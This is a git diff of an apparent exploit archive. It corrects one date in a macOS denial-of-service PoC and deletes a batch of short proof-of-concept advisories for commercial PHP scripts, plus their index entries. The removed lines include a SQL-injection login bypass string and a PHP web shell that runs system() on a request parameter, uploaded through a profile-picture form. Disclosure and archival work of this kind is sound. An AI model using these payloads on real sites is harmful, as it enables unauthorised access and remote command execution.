diff --git a/exploits/macos/dos/45391.py b/exploits/macos/dos/45391.py index 6f5225094..53bcc931d 100755 --- a/exploits/macos/dos/45391.py +++ b/exploits/macos/dos/45391.py @@ -1,5 +1,5 @@ # Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC) -# Date: 2019-09-10 +# Date: 2018-09-10 # Exploit Author: Sriram (@Sri_Hxor) # Vendor Homepage: https://support.apple.com/en-in/HT208848 # Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0 diff --git a/exploits/php/webapps/43988.txt b/exploits/php/webapps/43988.txt deleted file mode 100644 index e44a295b0..000000000 --- a/exploits/php/webapps/43988.txt +++ /dev/null @@ -1,19 +0,0 @@ -###################################################################################### -# Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS. -# Date: 06.02.2018 -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/ -# Category: Web Application -# Version: 1.0.2 -# Tested on: Linux Mint -# CVE: CVE-2018-6655 -####################################################################################### - -*Proof of Concept* -1. Login as a user -2. Goto "Edit Profile" -3. Edit any field with "" -4. Save Profile -5. You will be having a popup "PKP" \ No newline at end of file diff --git a/exploits/php/webapps/43989.txt b/exploits/php/webapps/43989.txt deleted file mode 100644 index 09cf92773..000000000 --- a/exploits/php/webapps/43989.txt +++ /dev/null @@ -1,20 +0,0 @@ -###################################################################################### -# Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS -# Date: 06.02.2018 -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script -# Category: Web Application -# Version: =>3.0 -# Tested on: Linux Mint -# CVE: NA -####################################################################################### - -Proof of Concept -================= -1. Login as a user -2. Goto "Edit Profile" -3. Edit any field with "" -4. Save Profile -5. You will be having a popup "PKP" \ No newline at end of file diff --git a/exploits/php/webapps/43990.txt b/exploits/php/webapps/43990.txt deleted file mode 100644 index bf816fa01..000000000 --- a/exploits/php/webapps/43990.txt +++ /dev/null @@ -1,20 +0,0 @@ -###################################################################################### -# Exploit Title: Naukri Clone Script - Stored XSS -# Date: 06.02.2018 -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/ -# Category: Web Application -# Version: 3.0.3 -# Tested on: Linux Mint -# CVE: na -####################################################################################### - -Proof of Concept -================= -1. Login as a jobseeker -2. Goto "Edit Profile" -3. Edit any field with "" -4. Save Profile -5. You will be having a popup "PKP" \ No newline at end of file diff --git a/exploits/php/webapps/43991.txt b/exploits/php/webapps/43991.txt deleted file mode 100644 index 3b08ab969..000000000 --- a/exploits/php/webapps/43991.txt +++ /dev/null @@ -1,20 +0,0 @@ -###################################################################################### -# Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS -# Date: 06.02.2018 -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/ -# Category: Web Application -# Version: 3.1 -# Tested on: Linux Mint -# CVE: na -####################################################################################### - -Proof of Concept -================= -1. Login to Hot Scripts Clone : Script Classified -2. Select Any Ads -3. Goto below review section and put "" as -title or description -4. You will have popup of "PKP" \ No newline at end of file diff --git a/exploits/php/webapps/44010.txt b/exploits/php/webapps/44010.txt deleted file mode 100644 index 17f45a485..000000000 --- a/exploits/php/webapps/44010.txt +++ /dev/null @@ -1,19 +0,0 @@ -###################################################################################### -# Exploit Title: Facebook Clone Script 1.0.5 - Stored XSS -# Date: 07.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 1.0.5 -# Tested on: Linux Mint -# CVE: CVE-2018-6858 -####################################################################################### - -Proof of Concept -================= -1. Login as a user -2. Goto "Comment" option of any post -3. Put "" as comment -4. You will be having a popup "PKP" \ No newline at end of file diff --git a/exploits/php/webapps/44011.txt b/exploits/php/webapps/44011.txt deleted file mode 100644 index 34b8e6e01..000000000 --- a/exploits/php/webapps/44011.txt +++ /dev/null @@ -1,22 +0,0 @@ -################################################################################################################# -# Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution -# Date: 07.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 2.0.2 -# Tested on: Linux Mint -# CVE: CVE-2018-6860 -################################################################################################################## - -Proof of Concept -================= -1. Login as Student/Parent -2. Go to "Edit Profile" to upload profile picture. -3. Once you find upload section, upload following code as a PHP file: - "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; } - ?> -4. Try to access given PHP file : [site.com]/malicious.php?cmd=ls \ No newline at end of file diff --git a/exploits/php/webapps/44012.txt b/exploits/php/webapps/44012.txt deleted file mode 100644 index ab01a6333..000000000 --- a/exploits/php/webapps/44012.txt +++ /dev/null @@ -1,19 +0,0 @@ -################################################################################################################# -# Exploit Title: Lawyer Search Script - 1.0.2 - Stored XSS -# Date: 07.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/lawyer-script/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 1.0.2 -# Tested on: Linux Mint -# CVE: CVE-2018-6861 -################################################################################################################## - -*Proof of Concept* - -1. Login into site -2. Goto "Edit Profile" -3. Put "" in any field -4. You will be having a popup "PKP" \ No newline at end of file diff --git a/exploits/php/webapps/44013.txt b/exploits/php/webapps/44013.txt deleted file mode 100644 index 7fa27cf12..000000000 --- a/exploits/php/webapps/44013.txt +++ /dev/null @@ -1,19 +0,0 @@ -######################################################################## -# Exploit Title: Bitcoin MLM Software 1.0.2 - Stored XSS -# Date: 07.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/bitcoin-mlm/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 1.0.2 -# Tested on: Linux Mint -# CVE: CVE-2018-6862 -########################################################################## - -*Proof of Concept* - -1. Login into the site -2. Goto "Edit Profile" -3. Put "" in any field -4. You will be having a popup "PKP" \ No newline at end of file diff --git a/exploits/php/webapps/44014.txt b/exploits/php/webapps/44014.txt deleted file mode 100644 index fae66b91a..000000000 --- a/exploits/php/webapps/44014.txt +++ /dev/null @@ -1,18 +0,0 @@ -###################################################################################### -# Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass -# Date: 07.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link:https://www.phpscriptsmall.com/product/select-your-college-script/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 2.0.2 -# Tested on: Linux Mint -# CVE: CVE-2018-6863 -####################################################################################### - -Proof of Concept - -1. Goto login page -2. put [admin' OR '1' = '1] as user and password field -3. You will be logged in as an authenticated user \ No newline at end of file diff --git a/exploits/php/webapps/44015.txt b/exploits/php/webapps/44015.txt deleted file mode 100644 index 34203e302..000000000 --- a/exploits/php/webapps/44015.txt +++ /dev/null @@ -1,20 +0,0 @@ -################################################################################################################# -# Exploit Title: Multi religion Responsive Matrimonial - 4.7.2 - Stored XSS -# Date: 07.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: -https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 4.7.2 -# Tested on: Linux Mint -# CVE: CVE-2018-6864 -################################################################################################################## - -*Proof of Concept* - -1. Login into site -2. Goto "Edit Profile" -3. Put "" in any field -4. You will be having a popup "PKP" \ No newline at end of file diff --git a/exploits/php/webapps/44170.txt b/exploits/php/webapps/44170.txt deleted file mode 100644 index 52e1240f7..000000000 --- a/exploits/php/webapps/44170.txt +++ /dev/null @@ -1,19 +0,0 @@ -####################################################### -# Exploit Title: Learning and Examination Management System Script 2.3.1 – Stored XSS -# Date: 09.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/learning-examination-management-system/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 2.3.1 -# Tested on: Linux Mint -# CVE: CVE-2018-6866 -####################################################### - -Proof of Concept ------------------ -1. Login into the site -2. Goto “Message” options -3. Put as message / reply message -4. You will be having a popup “PKP” \ No newline at end of file diff --git a/exploits/php/webapps/44171.txt b/exploits/php/webapps/44171.txt deleted file mode 100644 index 93c2bf635..000000000 --- a/exploits/php/webapps/44171.txt +++ /dev/null @@ -1,19 +0,0 @@ -####################################################### -# Exploit Title: Alibaba Clone Script 1.0.2 – Stored XSS -# Date: 09.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/alibaba-clone/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 1.0.2 -# Tested on: Linux Mint -# CVE: CVE-2018-6867 -####################################################### - -Proof of Concept ------------------ -1. Login into the site -2. Goto “Edit Profile” -3. Put in any field -4. You will be having a popup “PKP” \ No newline at end of file diff --git a/exploits/php/webapps/44172.txt b/exploits/php/webapps/44172.txt deleted file mode 100644 index d4f4fead5..000000000 --- a/exploits/php/webapps/44172.txt +++ /dev/null @@ -1,19 +0,0 @@ -######################################################################## -# Exploit Title: Slickdeals/DealNews/Groupon Clone Script 3.0.2 – Stored XSS -# Date: 09.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 3.0.2 -# Tested on: Linux Mint -# CVE: CVE-2018-6868 -########################################################################## - -Proof of Concept ------------------------- -1. Login into the site -2. Goto “Edit Profile” -3. Put in any field -4. You will be having a popup “PKP” \ No newline at end of file diff --git a/exploits/php/webapps/44185.txt b/exploits/php/webapps/44185.txt deleted file mode 100644 index ba106958c..000000000 --- a/exploits/php/webapps/44185.txt +++ /dev/null @@ -1,19 +0,0 @@ - ###################################################################################### -# Exploit Title: Schools Alert Management Script - 2.0.2 - Authentication Bypass -# Date: 07.02.2018 -# Vendor Homepage: https://www.phpscriptsmall.com/ -# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ -# Category: Web Application -# Exploit Author: Prasenjit Kanti Paul -# Web: http://hack2rule.wordpress.com/ -# Version: 2.0.2 -# Tested on: Linux Mint -# CVE: CVE-2018-6859 -####################################################################################### - -Proof of Concept -================= -1. Go to login page -2. Choose Student/Parent/Management to login -2. put [admin' OR '1' = '1] as user and password field -3. You will be logged in as Student/Parent/Management \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c2e936a22..d3a173108 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -38614,19 +38614,9 @@ id,file,description,date,author,type,platform,port 43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php, 43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php, 43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware, -43988,exploits/php/webapps/43988.txt,"Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80 -43989,exploits/php/webapps/43989.txt,"Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80 -43990,exploits/php/webapps/43990.txt,"Naukri Clone Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80 -43991,exploits/php/webapps/43991.txt,"Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80 43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80 43995,exploits/php/webapps/43995.txt,"Entrepreneur Dating Script 2.0.2 - Authentication Bypass",2018-02-07,L0RD,webapps,php,80 44008,exploits/php/webapps/44008.txt,"Naukri Clone Script 3.0.3 - 'indus' SQL Injection",2018-02-10,L0RD,webapps,php, -44010,exploits/php/webapps/44010.txt,"Facebook Clone Script 1.0.5 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php, -44011,exploits/php/webapps/44011.txt,"Schools Alert Management Script 2.0.2 - Arbitrary File Upload",2018-02-10,"Prasenjit Kanti Paul",webapps,php, -44012,exploits/php/webapps/44012.txt,"Lawyer Search Script 1.0.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php, -44013,exploits/php/webapps/44013.txt,"Bitcoin MLM Software 1.0.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php, -44014,exploits/php/webapps/44014.txt,"Select Your College Script 2.0.2 - Authentication Bypass",2018-02-10,"Prasenjit Kanti Paul",webapps,php, -44015,exploits/php/webapps/44015.txt,"Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php, 44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php, 44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php, 44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php, @@ -39455,10 +39445,6 @@ id,file,description,date,author,type,platform,port 44164,exploits/php/webapps/44164.txt,"Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload",2018-02-22,"Ihsan Sencan",webapps,php, 44165,exploits/php/webapps/44165.txt,"Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, 44166,exploits/jsp/webapps/44166.txt,"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities",2018-02-22,"Core Security",webapps,jsp, -44170,exploits/php/webapps/44170.txt,"Learning and Examination Management System - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php, -44171,exploits/php/webapps/44171.txt,"Alibaba Clone Script 1.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php, -44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php, -44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php, 44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php, 44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple, 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,